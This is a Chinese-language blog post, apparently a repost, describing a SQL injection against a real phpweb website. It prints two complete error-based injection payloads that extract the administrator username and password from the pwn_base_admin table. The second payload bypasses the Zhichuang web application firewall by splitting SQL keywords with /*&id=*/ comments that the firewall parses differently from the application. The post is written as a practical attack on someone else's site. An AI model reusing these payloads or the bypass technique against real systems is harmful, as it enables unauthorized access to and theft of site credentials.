繞過智創防火牆，SQL注入phpweb

今天**xiaoliumang發來乙個phpweb的站，然後就一起看了下。phpweb有注入漏洞的，之前說過。先加些語句看了下，可見有注入，而且可以報錯。雖然sql語句中我們提交的單引號變成了%27，但不要緊這是瀏覽器的事，待會用**直接提交就行了。

然後直接上利用語句

?116'/**/and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x7e,0x27,pwn_base_admin.user,0x27,0x7e,pwn_base_admin.password,0x27,0x7e)/**/from/**/pwn_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1.html

結果出現了智創的waf。 www.2cto.com

本來想直接放棄了的，最後還是霸王硬上弓了。思路是：

1、看看該waf攔截什麼語句，先依次提交select，union，from等關鍵字，然後再將這些sql關鍵字組合，最後發現只要有select from就會攔截，至於其他的匹配關鍵字和關鍵字組合沒有測試。

2、繞過首先想到的是轉換大小寫，結果沒用，一般waf都會轉換大小寫的；其次是編碼，但是在這裡phpweb直接是將語句拼接到sql查詢語句裡了，所以如果編碼的話即使可以繞過waf，也不會構造出有效的sql查詢語句。

3、試了試協議方面的，在get後面多加幾個空格，多加幾個問號，只要不是bad request的就試，結果這種get資料報可以變的地方比較少，也沒找到繞過方法。

4、直接說繞過思路吧，其實是利用了phpweb和waf的理解不一致。phpweb是將問號後面，.html前面的語句直接拼接到sql查詢語句中，不管編碼沒編碼、有沒有「=」，「&」（這兩個符號是http協議裡用來給引數賦值和分割引數的）；而waf會將問號後面的根據http協議來進行解析。這樣的話，我們就可以用/*&id=*/來分割構造的sql語句來繞過waf了。最後構造語句如下：

/product/class/?id/*=*/abc'/**/and/**/(select/**/1/*&id=*/from(/*&id=*/select/**//*&id=*/count(*),/*&id=*/concat((/*&id=*/select/**/(/*&id=*/select/**/(/*&id=*/select/**//*&id=*/concat(0x7e,0x27,pwn_base_admin.user,0x27,0x7e,pwn_base_admin.password,0x27,0x7e)/**//*&id=*/from/**/pwn_base_admin/**/limit/**/0,1))/**//*&id=*/from/**/information_schema.tables/**//*&id=*/limit/**/0,1),/*&id=*/floor(rand(0)*2))x/**//*&id=*/from/**//*&id=*/information_schema.tables/**//*&id=*/group/**//*&id=*/by/**/x)a)/**//*&id=*/and/**//*&id=*/'1'='1.html

如圖:

繞過智創防火牆，SQL注入phpweb

nmap繞過防火牆

Nmap繞過防火牆

ashx繞過防火牆

繞過智創防火牆，SQL注入phpweb

nmap繞過防火牆

Nmap繞過防火牆

ashx繞過防火牆

相關推薦